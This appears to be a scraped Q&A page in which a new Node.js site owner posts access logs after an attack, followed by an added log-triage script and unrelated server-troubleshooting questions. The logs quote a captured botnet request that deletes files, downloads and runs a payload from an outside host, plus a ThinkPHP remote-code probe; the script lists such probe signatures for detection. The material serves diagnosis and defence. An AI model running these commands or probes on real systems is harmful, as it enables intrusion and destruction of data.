My node js website was attacked. How do I analyze what happened? - node.js

I am new to web programming and I coded a Node js website. I know C very well but not JS.
I recently changed the port forward to port 80 and it didn't take long before I was attacked. I saved the logs and undid the forwarding of port 80. Could anyone help me analyze what happened from the logs I got and help me know what has to be done in order to repair the damage?
Basically, what was happening was my website constantly redirected me to a sketchy p*rn website...
Should I reinstall Windows?
How can I prevent this from happening again?
Here are the logs:
GET / 302 3.645 ms - 28
POST /HNAP1/ 404 1.731 ms - 146
GET /shell?cd+/tmp;rm+-rf+*;wget+jx.qingdaosheng.com/jaws;sh+/tmp/jaws - - ms - -
GET / 302 3.529 ms - 28
GET /login 200 4.956 ms - 899
GET / 302 3.630 ms - 28
POST /Autodiscover/Autodiscover.xml 404 1.961 ms - 169
HEAD / 302 3.398 ms - 28
HEAD /login 200 5.009 ms - 899
GET /admin/assets/plugins/elfinder/php/connector.php 404 4.192 ms - 186
GET / 302 3.543 ms - 28
GET / 302 2.859 ms - 28
GET / 302 2.717 ms - 28
GET / 302 2.777 ms - 28
GET / 302 6.587 ms - 28
GET / 302 2.774 ms - 28
GET / 302 2.781 ms - 28
GET / 302 2.770 ms - 28
GET / 302 2.978 ms - 28
GET / 302 2.645 ms - 28
GET / 302 2.802 ms - 28
GET / 302 2.725 ms - 28
GET / 302 2.794 ms - 28
GET / 302 1.433 ms - 28
GET / 302 2.773 ms - 28
GET / 302 2.718 ms - 28
GET / 302 2.785 ms - 28
GET / 302 2.742 ms - 28
GET / 302 6.103 ms - 28
GET / 302 2.771 ms - 28
GET / 302 2.745 ms - 28
GET / 302 0.895 ms - 28
GET / 302 2.786 ms - 28
GET / 302 2.787 ms - 28
GET / 302 2.877 ms - 28
GET / 302 2.757 ms - 28
GET / 302 5.917 ms - 28
GET / 302 2.831 ms - 28
GET / 302 2.800 ms - 28
GET / 302 2.792 ms - 28
GET / 302 4.423 ms - 28
GET / 302 2.816 ms - 28
GET / 302 2.695 ms - 28
GET / 302 2.738 ms - 28
GET / 302 2.766 ms - 28
GET / 302 2.745 ms - 28
GET / 302 2.765 ms - 28
GET / 302 2.698 ms - 28
GET / 302 2.854 ms - 28
GET / 302 2.839 ms - 28
GET / 302 6.197 ms - 28
GET / 302 2.983 ms - 28
GET / 302 2.794 ms - 28
GET / 302 2.722 ms - 28
GET / 302 2.780 ms - 28
GET / 302 2.776 ms - 28
GET / 302 2.775 ms - 28
GET / 302 2.742 ms - 28
GET / 302 2.772 ms - 28
GET / 302 2.668 ms - 28
GET / 302 2.723 ms - 28
GET / 302 2.717 ms - 28
GET / 302 5.661 ms - 28
GET / 302 2.771 ms - 28
GET / 302 2.700 ms - 28
GET / 302 6.351 ms - 28
GET / 302 2.801 ms - 28
GET / 302 2.734 ms - 28
GET / 302 6.229 ms - 28
GET / 302 1.745 ms - 28
GET / 302 2.727 ms - 28
GET / 302 2.777 ms - 28
GET / 302 2.734 ms - 28
GET / 302 1.434 ms - 28
GET / 302 2.739 ms - 28
GET / 302 2.711 ms - 28
GET / 302 5.326 ms - 28
GET / 302 2.664 ms - 28
GET / 302 2.677 ms - 28
GET / 302 0.891 ms - 28
GET / 302 2.783 ms - 28
GET / 302 2.745 ms - 28
GET / 302 2.738 ms - 28
GET / 302 2.717 ms - 28
GET / 302 2.740 ms - 28
GET / 302 2.720 ms - 28
GET / 302 2.769 ms - 28
GET / 302 2.717 ms - 28
GET / 302 2.749 ms - 28
GET / 302 5.041 ms - 28
GET / 302 2.789 ms - 28
GET / 302 2.725 ms - 28
GET / 302 2.657 ms - 28
GET / 302 2.712 ms - 28
GET / 302 2.709 ms - 28
GET / 302 2.681 ms - 28
GET / 302 2.708 ms - 28
GET / 302 2.678 ms - 28
GET / 302 2.686 ms - 28
GET / 302 6.256 ms - 28
GET / 302 1.400 ms - 28
GET / 302 2.749 ms - 28
GET / 302 2.741 ms - 28
GET / 302 2.779 ms - 28
GET / 302 2.766 ms - 28
GET / 302 2.742 ms - 28
GET / 302 2.774 ms - 28
GET / 302 5.494 ms - 28
GET / 302 2.724 ms - 28
GET / 302 2.723 ms - 28
GET / 302 2.737 ms - 28
GET / 302 2.715 ms - 28
GET / 302 2.667 ms - 28
GET / 302 2.721 ms - 28
GET / 302 2.721 ms - 28
GET / 302 2.781 ms - 28
GET / 302 2.734 ms - 28
GET / 302 2.708 ms - 28
GET / 302 2.747 ms - 28
GET / 302 2.769 ms - 28
GET / 302 2.768 ms - 28
GET / 302 2.776 ms - 28
GET / 302 5.605 ms - 28
GET / 302 2.741 ms - 28
GET / 302 2.837 ms - 28
GET / 302 2.724 ms - 28
GET / 302 2.766 ms - 28
GET / 302 2.740 ms - 28
GET / 302 5.212 ms - 28
GET / 302 2.696 ms - 28
GET / 302 2.732 ms - 28
GET / 302 2.717 ms - 28
GET / 302 2.700 ms - 28
POST /boaform/admin/formLogin 404 3.031 ms - 163
GET / 302 3.579 ms - 28
POST /boaform/admin/formLogin 404 2.609 ms - 163
HEAD / 302 7.173 ms - 28
GET / 302 3.531 ms - 28
GET / 302 3.738 ms - 28
GET /login 200 6.611 ms - 899
GET /?XDEBUG_SESSION_START=phpstorm 302 3.465 ms - 28
GET /login 200 4.785 ms - 899
GET / 302 6.692 ms - 28
GET /login 200 4.763 ms - 899
GET / 302 3.788 ms - 28
GET /login 200 5.032 ms - 899
GET / 302 3.390 ms - 28
GET / 302 6.433 ms - 28
GET / 302 3.553 ms - 28
GET /login 200 4.816 ms - 899
GET / 302 3.593 ms - 28
GET /login 200 3.175 ms - 899
GET / 302 3.621 ms - 28
GET / 302 3.566 ms - 28
GET / 302 3.481 ms - 28
GET / 302 3.204 ms - 28
GET /login 200 4.710 ms - 899
GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 404 3.642 ms - 148
GET / 302 3.487 ms - 28
GET /login 200 4.985 ms - 899
GET / 302 3.500 ms - 28
GET /login 200 8.021 ms - 899
GET / 302 3.668 ms - 28
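
A triage pass over request lines in the format shown in the post above, added here as an example; it is not code from the original post. The signature list is built from paths that appear in that log, the sample lines are constructed with `example.invalid` as a placeholder host, and the function names are illustrative.

```javascript
// Added example: triage of morgan "dev"-style request lines
// (":method :url :status :response-time ms - :content-length").
// Signatures and sample lines are modeled on the log in the post.
const LINE_RE = /^([A-Z]+) (\S+) (\d{3}|-) (\S+) ms - (\S+)$/;

// Paths that belong to other products (routers, PHP apps, Exchange).
// An Express app has no reason to serve them, so a hit is a scanner probe.
const PROBES = [
  [/^\/HNAP1\//, 'router HNAP interface'],
  [/^\/boaform\//, 'router Boa admin form'],
  [/^\/shell\?/, 'shell command in query string'],
  [/^\/Autodiscover\//i, 'Exchange Autodiscover'],
  [/elfinder\/php\/connector\.php/, 'elFinder PHP connector'],
  [/XDEBUG_SESSION_START=/, 'PHP Xdebug session'],
  [/think\\app\/invokefunction/, 'ThinkPHP invokefunction'],
];

function classify(url, status) {
  const hit = PROBES.find(([re]) => re.test(url));
  if (!hit) return { probe: null, verdict: 'normal' };
  // 404 means no route matched the probe. Anything else (including "-",
  // where no status was logged) needs a manual look at how the app answered.
  return { probe: hit[1], verdict: status === '404' ? 'rejected' : 'review' };
}

function parseLog(text) {
  const rows = [];
  const raw = text.split(/\r?\n/).map((l) => l.trim()).filter(Boolean);
  for (let i = 0; i < raw.length; i++) {
    let m = LINE_RE.exec(raw[i]);
    // A long URL can be wrapped onto a second line by a terminal or a paste.
    if (!m && i + 1 < raw.length) {
      m = LINE_RE.exec(raw[i] + ' ' + raw[i + 1]);
      if (m) i++;
    }
    if (!m) { rows.push({ raw: raw[i], verdict: 'unparsed' }); continue; }
    const [, method, url, status] = m;
    rows.push({ method, url, status, ...classify(url, status) });
  }
  return rows;
}

function summarize(rows) {
  const out = { normal: 0, rejected: 0, review: [], unparsed: 0 };
  for (const r of rows) {
    if (r.verdict === 'review') out.review.push(`${r.method} ${r.url} -> ${r.status} (${r.probe})`);
    else out[r.verdict]++;
  }
  return out;
}

// Constructed sample; the last entry is deliberately wrapped over two lines.
const SAMPLE = String.raw`GET / 302 3.645 ms - 28
POST /HNAP1/ 404 1.731 ms - 146
GET /shell?cd+/tmp;wget+example.invalid/x;sh+/tmp/x - - ms - -
GET /login 200 4.956 ms - 899
GET /?XDEBUG_SESSION_START=phpstorm 302 3.465 ms - 28
GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array 404
3.642 ms - 148`;

console.log(summarize(parseLog(SAMPLE)));
```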

Related

how to block random calls from outside

Running nodemon with Express on my API domain.
I keep getting random calls, apparently from outside.
Kinda ruins my workflow... :)
[nodemon] 1.19.1
[nodemon] to restart at any time, enter `rs`
[nodemon] watching: *.*
[nodemon] starting `node server.js`
3000 ok
mongo ok
GET /article.asp 404 3.246 ms - 150
GET /cintact.htm 404 0.380 ms - 150
GET /mainpage.html 404 0.197 ms - 152
GET /wan.asp 404 0.238 ms - 146
GET /aben.htm 404 0.220 ms - 147
GET /diispostmaster.asp 404 0.191 ms - 157
GET /molu.asp 404 0.192 ms - 147
GET /xz.asp 404 0.215 ms - 145
GET /server.asp 404 0.166 ms - 149
GET /admin_softdl.asp 404 0.251 ms - 155
GET /mda.htm 404 0.246 ms - 146
GET /_.htm 404 0.207 ms - 144
GET /gh.txt 404 0.221 ms - 145
GET /windowx.txt 404 0.214 ms - 150
GET /jc.html 404 0.208 ms - 146
GET /tongyi.html 404 0.189 ms - 150
GET /abb.asp 404 0.236 ms - 146
GET /zijing.html 404 0.207 ms - 150
GET /dsf.jsp 404 0.188 ms - 146
GET /zongg/daima.asp?id=65 404 0.857 ms - 154
GET /200861912234469.asp 404 0.254 ms - 158
GET /loveyun.asp 404 0.175 ms - 150
GET /z.htm 404 0.201 ms - 144
GET /xxoo.txt 404 0.182 ms - 147
GET /dd.txt 404 0.155 ms - 145
GET /anti-microsoft.html 404 0.204 ms - 158
GET /ckfinder/userfiles/files/robots.txt 404 0.188 ms - 174
GET /test.txt 404 0.205 ms - 147
GET /hacked.asp 404 0.220 ms - 149
GET /text.txt 404 0.190 ms - 147
GET /gha.asp 404 0.204 ms - 146
GET /hnboy.asp 404 0.224 ms - 148
GET /the.htm 404 1.513 ms - 146
GET /sear.asp 404 0.182 ms - 147
GET /010.txt 404 0.192 ms - 146
GET /aa.asp 404 0.225 ms - 145
GET /2009091519484277962.htm 404 0.209 ms - 162
GET /jyhack.com.txt 404 0.223 ms - 153
GET /3.asa 404 0.265 ms - 144
GET /ccs.txt 404 0.206 ms - 146
GET /sc201052034222.asp 404 0.234 ms - 157
GET /xt.asp 404 0.198 ms - 145
GET /error.asp 404 0.217 ms - 148
GET /hacker.aspx 404 0.241 ms - 150
GET /ab.php 404 0.187 ms - 145
GET /images/log.php 404 0.205 ms - 153
GET /homepage.htm 404 0.230 ms - 151
GET /xt.html 404 0.180 ms - 146
GET /junior.asp 404 0.205 ms - 149
GET /net.asp 404 0.183 ms - 146
GET /db.txt 404 0.213 ms - 145
.....list goes on and on................................
Should I add extra security or just block the messages?
Thanks for any advice : )

ASP core navigation between applications on same domain

I have one domain and 3 web applications (and I'll have much more).
I would like to create the main application which will contain some list with links and description about these applications.
I have the main application in IIS and then others like sub-applications. I would like to navigate between them like mydomain.com/app1/then/something and mydomain.com/app2/index...
When I create pure HTML (using <a href="">) everything is working, but when I create a web application, there is a problem.
In Firefox I get only a white screen when I try to access a sub-application
(e.g. mydomain.com/app1) and in Chrome HTTP 500.
I am using Razor pages.
I expect that this is a problem with routing so I'll have to change some routing conditions or map the other apps.
Could you give me a hint, please? I tried to search for some solutions, but I couldn't find one (I was probably searching bad sentence).
Thank you for every advice.
Edit: Added logs
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2018-09-25 07:33:35
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2018-09-25 07:33:35 10.208.132.246 GET / - 12443 - 10.217.165.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:62.0)+Gecko/20100101+Firefox/62.0 - 200 0 0 1771
2018-09-25 07:33:35 10.208.132.246 GET /css/site.css - 12443 - 10.217.165.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:62.0)+Gecko/20100101+Firefox/62.0 https://example.com:12443/ 304 0 0 9
2018-09-25 07:33:35 10.208.132.246 GET /lib/bootstrap/dist/css/bootstrap.css - 12443 - 10.217.165.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:62.0)+Gecko/20100101+Firefox/62.0 https://example.com:12443/ 304 0 0 10
2018-09-25 07:33:35 10.208.132.246 GET /css/site.min.css v=kHvJwvVAK1eJLN4w8xygUR3nbvlLmRwi5yr-OuAO90E 12443 - 10.217.165.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:62.0)+Gecko/20100101+Firefox/62.0 https://example.com:12443/ 304 0 0 9
2018-09-25 07:33:35 10.208.132.246 GET /js/site.min.js v=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU 12443 - 10.217.165.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:62.0)+Gecko/20100101+Firefox/62.0 https://example.com:12443/ 200 0 0 5
2018-09-25 07:33:35 10.208.132.246 GET /lib/jquery/dist/jquery.js - 12443 - 10.217.165.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:62.0)+Gecko/20100101+Firefox/62.0 https://example.com:12443/ 304 0 0 2
2018-09-25 07:33:35 10.208.132.246 GET /js/site.js v=dLGP40S79Xnx6GqUthRF6NWvjvhQ1nOvdVSwaNcgG18 12443 - 10.217.165.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:62.0)+Gecko/20100101+Firefox/62.0 https://example.com:12443/ 304 0 0 4
2018-09-25 07:33:35 10.208.132.246 GET /lib/bootstrap/dist/js/bootstrap.js - 12443 - 10.217.165.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:62.0)+Gecko/20100101+Firefox/62.0 https://example.com:12443/ 304 0 0 4
2018-09-25 07:33:35 10.208.132.246 GET /favicon.ico - 12443 - 10.217.165.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:62.0)+Gecko/20100101+Firefox/62.0 - 200 0 0 50
2018-09-25 07:33:43 10.208.132.246 GET /App1/ - 12443 - 10.217.165.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:62.0)+Gecko/20100101+Firefox/62.0 https://example.com:12443/ 500 19 183 43
2018-09-25 07:33:46 10.208.132.246 GET /App1 - 12443 - 10.217.165.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:62.0)+Gecko/20100101+Firefox/62.0 - 500 19 183 42
2018-09-25 07:33:54 10.208.132.246 GET /App2 - 12443 - 10.217.165.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:62.0)+Gecko/20100101+Firefox/62.0 - 500 19 183 44
2018-09-25 07:34:03 10.208.132.246 GET /App2/App2SpecificPage/Parameter - 12443 - 10.217.165.172 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:62.0)+Gecko/20100101+Firefox/62.0 - 500 19 183 42
Many thanks to poke.
My problem was a combination of missing app.UsePathBase("/app1") in the application Startup.cs file and bad settings in IIS.
But the main problem was that I didn't add the application to the middleware.

website hosted in aws ec2 not loading

I have a website hosted in AWS EC2 (Windows instance) which stopped loading a few days ago, and I have no clue whatsoever why. Below is the output of traceroute, please help.
Tracing route to 126news.com [18.221.68.117]
over a maximum of 30 hops:
1 3 ms 3 ms 1 ms WirelessAP [192.168.1.1]
2 6 ms 20 ms 3 ms 10.111.192.1
3 3 ms 3 ms 3 ms 10.229.0.13
4 3 ms 3 ms 4 ms broadband.actcorp.in [183.82.14.221]
5 3 ms 3 ms 6 ms 14.141.24.169.static-hyderabad.tcl.net.in [14.141.24.169]
6 * * * Request timed out.
7 33 ms 28 ms 29 ms ix-ae-4-2.tcore1.cxr-chennai.as6453.net [180.87.36.9]
8 65 ms 64 ms 68 ms if-ae-13-2.tcore1.svw-singapore.as6453.net [180.87.36.83]
9 100 ms 67 ms 70 ms if-ae-11-2.thar1.svq-singapore.as6453.net [180.87.98.37]
10 64 ms 66 ms 64 ms ae-6.r00.sngpsi05.sg.bb.gin.ntt.net [129.250.8.241]
11 64 ms 72 ms 64 ms ae-10.r20.sngpsi05.sg.bb.gin.ntt.net [129.250.7.18]
12 247 ms 240 ms 240 ms ae-8.r22.snjsca04.us.bb.gin.ntt.net [129.250.3.48]
13 243 ms 245 ms 249 ms ae-8.r21.chcgil09.us.bb.gin.ntt.net [129.250.5.16]
14 244 ms 244 ms 245 ms ae-2.r07.chcgil09.us.bb.gin.ntt.net [129.250.4.214]
15 249 ms 248 ms 249 ms ae-1.a01.chcgil09.us.bb.gin.ntt.net [129.250.5.94]
16 246 ms 252 ms 361 ms ae-2.amazon.chcgil09.us.bb.gin.ntt.net [129.250.201.106]
17 262 ms 284 ms 255 ms 52.95.62.122
18 261 ms 261 ms 262 ms 52.95.62.125
19 * * * Request timed out.
20 260 ms 263 ms 259 ms 54.239.46.161
21 256 ms 272 ms 258 ms 54.239.43.225
22 * * * Request timed out.
23 * * * Request timed out.
24 260 ms 258 ms 261 ms 52.95.1.234
25 255 ms 258 ms 255 ms 52.95.1.247
26 262 ms 259 ms 256 ms 52.95.1.106
27 259 ms 259 ms 260 ms 52.95.1.87
28 253 ms 253 ms 252 ms 52.95.3.142
29 * * * Request timed out.
30 * * * Request timed out.
Trace complete.

bot framework returning unauthorized after server reboot

I have my bot. It's online. On a local machine the bot is working fine, but on the server it is returning an unauthorized error. These are the IIS logs:
2016-12-30 23:06:44 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.78.21.180 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 93
2016-12-30 23:06:44 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.121.93.134 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 187
2016-12-30 23:06:45 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.127.183.46 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 374
2016-12-30 23:06:45 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.121.88.101 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 187
2016-12-30 23:06:45 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.127.183.46 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 374
2016-12-30 23:06:45 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.127.183.64 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 375
2016-12-30 23:06:47 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.121.93.134 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 187
2016-12-30 23:06:47 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.121.93.134 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 187
2016-12-30 23:06:47 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.127.183.64 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 374
2016-12-30 23:06:47 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.121.92.251 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 187
2016-12-30 23:06:48 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.127.183.46 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 390
2016-12-30 23:06:48 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.121.91.106 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 187
2016-12-30 23:06:48 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.121.93.134 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 187
2016-12-30 23:06:48 104.168.146.32 POST /rbots/mybot/api/messages - 443 - 40.78.17.157 BF-Facebook+(Microsoft-BotFramework/3.1++https://botframework.com/ua) - 401 0 0 78
We didn't do anything to the bot; however, suddenly it stopped working after the reboot. I gave full permission to the folder that's containing the bot, but it's still not working.

Can somebody explain these TIMEOUT entries in my IIS SMTP log?

For some mails I'm trying to send over our SMTP server I get entries in the log like shown below.
Can somebody explain WHAT is timing out here and what IIS is trying to do?
2011-11-27 13:57:26 10.177.121.40 OutboundConnectionCommand SMTPSVC1 BXWEB00 - 25 DATA - - 0 0 4 0 31 SMTP - - - -
2011-11-27 13:57:26 10.177.121.40 OutboundConnectionResponse SMTPSVC1 BXWEB00 - 25 - - 354+End+data+with+<CR><LF>.<CR><LF> 0 0 35 0 31 SMTP - - - -
2011-11-27 13:57:26 10.177.121.40 OutboundConnectionResponse SMTPSVC1 BXWEB00 - 25 - - 250+2.0.0+Ok:+queued+as+F35C24A057 0 0 34 0 31 SMTP - - - -
2011-11-27 13:57:26 10.177.121.40 OutboundConnectionCommand SMTPSVC1 BXWEB00 - 25 QUIT - - 0 0 4 0 31 SMTP - - - -
2011-11-27 13:57:26 10.177.121.40 OutboundConnectionResponse SMTPSVC1 BXWEB00 - 25 - - 221+2.0.0+Bye 0 0 13 0 31 SMTP - - - -
2011-11-27 13:58:32 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 TIMEOUT - BXWEB00.netfra.local 121 16777343 193 67831 637670 SMTP - - - -
2011-11-27 13:58:32 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 QUIT - BXWEB00.netfra.local 240 638122 193 67831 637670 SMTP - - - -
2011-11-27 13:59:57 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 EHLO - +BXWEB00.netfra.local 250 0 186 25 0 SMTP - - - -
2011-11-27 13:59:57 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 MAIL - +FROM:<Email-Service#serverdomain.com> 250 0 62 49 0 SMTP - - - -
2011-11-27 13:59:57 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 RCPT - +TO:<recipient1#anotherdomain.de> 250 0 35 32 0 SMTP - - - -
2011-11-27 13:59:57 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 DATA - +<CHILKAT-MID-937818f1-c530-c3c7-e380-cc106ff13646#BXWEB00.netfra.local> 250 0 155 67995 0 SMTP - - - -
2011-11-27 13:59:57 10.177.121.40 OutboundConnectionResponse SMTPSVC1 BXWEB00 - 25 - - 220+ffm2mta20.hpuss.de+ESMTP 0 0 28 0 16 SMTP - - - -
2011-11-27 13:59:57 10.177.121.40 OutboundConnectionCommand SMTPSVC1 BXWEB00 - 25 EHLO - BXWEB00.netfra.local 0 0 4 0 16 SMTP - - - -
2011-11-27 13:59:57 10.177.121.40 OutboundConnectionResponse SMTPSVC1 BXWEB00 - 25 - - 250-ffm2mta20.hpuss.de 0 0 22 0 16 SMTP - - - -
2011-11-27 13:59:57 10.177.121.40 OutboundConnectionCommand SMTPSVC1 BXWEB00 - 25 MAIL - FROM:<Email-Service#serverdomain.com>+SIZE=68278 0 0 4 0 16 SMTP - - - -
2011-11-27 13:59:57 10.177.121.40 OutboundConnectionResponse SMTPSVC1 BXWEB00 - 25 - - 250+2.1.0+Ok 0 0 12 0 16 SMTP - - - -
2011-11-27 13:59:57 10.177.121.40 OutboundConnectionCommand SMTPSVC1 BXWEB00 - 25 RCPT - TO:<recipient1#anotherdomain.de> 0 0 4 0 16 SMTP - - - -
2011-11-27 13:59:57 10.177.121.40 OutboundConnectionResponse SMTPSVC1 BXWEB00 - 25 - - 250+2.1.5+Ok 0 0 12 0 16 SMTP - - - -
2011-11-27 13:59:57 10.177.121.40 OutboundConnectionCommand SMTPSVC1 BXWEB00 - 25 DATA - - 0 0 4 0 16 SMTP - - - -
2011-11-27 13:59:57 10.177.121.40 OutboundConnectionResponse SMTPSVC1 BXWEB00 - 25 - - 354+End+data+with+<CR><LF>.<CR><LF> 0 0 35 0 16 SMTP - - - -
2011-11-27 13:59:57 10.177.121.40 OutboundConnectionResponse SMTPSVC1 BXWEB00 - 25 - - 250+2.0.0+Ok:+queued+as+DB9C54A057 0 0 34 0 31 SMTP - - - -
2011-11-27 13:59:57 10.177.121.40 OutboundConnectionCommand SMTPSVC1 BXWEB00 - 25 QUIT - - 0 0 4 0 31 SMTP - - - -
2011-11-27 13:59:57 10.177.121.40 OutboundConnectionResponse SMTPSVC1 BXWEB00 - 25 - - 221+2.0.0+Bye 0 0 13 0 31 SMTP - - - -
2011-11-27 14:02:02 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 TIMEOUT - BXWEB00.netfra.local 121 16777343 193 8813 637093 SMTP - - - -
2011-11-27 14:02:02 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 QUIT - BXWEB00.netfra.local 240 637280 193 8813 637093 SMTP - - - -
2011-11-27 14:05:02 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 TIMEOUT - BXWEB00.netfra.local 121 16777343 193 68489 636140 SMTP - - - -
2011-11-27 14:05:02 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 QUIT - BXWEB00.netfra.local 240 636608 193 68489 636140 SMTP - - - -
2011-11-27 14:06:02 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 TIMEOUT - BXWEB00.netfra.local 121 16777343 193 8501 605751 SMTP - - - -
2011-11-27 14:06:02 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 QUIT - BXWEB00.netfra.local 240 605939 193 8501 605751 SMTP - - - -
2011-11-27 14:07:32 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 TIMEOUT - BXWEB00.netfra.local 121 16777343 193 8813 605377 SMTP - - - -
2011-11-27 14:07:32 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 QUIT - BXWEB00.netfra.local 240 605565 193 8813 605377 SMTP - - - -
2011-11-27 14:08:58 127.0.0.1 BXWEB00.netfra.local SMTPSVC1 BXWEB00 127.0.0.1 0 EHLO - +BXWEB00.netfra.local 250 0 186 25 0 SMTP - - - -
The timeouts were caused by not actively closing the connection from the client to the SMTP server. The component used was Chilkat (http://www.chilkatsoft.com/refdoc/csMailManRef.html) and the manual states:
The mailman object automatically opens an SMTP connection (if necessary) whenever an email-sending method is called. The connection is kept open until explicitly closed by this method. Calling this method is entirely optional. The SMTP connection is also automatically closed when the mailman object is destructed. Thus, if an application calls SendEmail 10 times to send 10 emails, the 1st call will open the SMTP connection, while the subsequent 9 will send over the existing connection (unless a property such as username, login, hostname, etc. is changed, which would force the connection to become closed and re-established with the next mail-sending method call).
Note: This method sends a QUIT command to the SMTP server prior to closing the connection.
However, this seems to be a problem for some SMTP servers. They want the connection to be closed after each mail.
You didn't post the lines before that TIMEOUT line. If I had to guess, the previous line was a RCPT TO line, when the DATA line was expected.
This smells like an antivirus issue. For a test, try disabling any antivirus software you have, and see if the entries go away.
--Dave
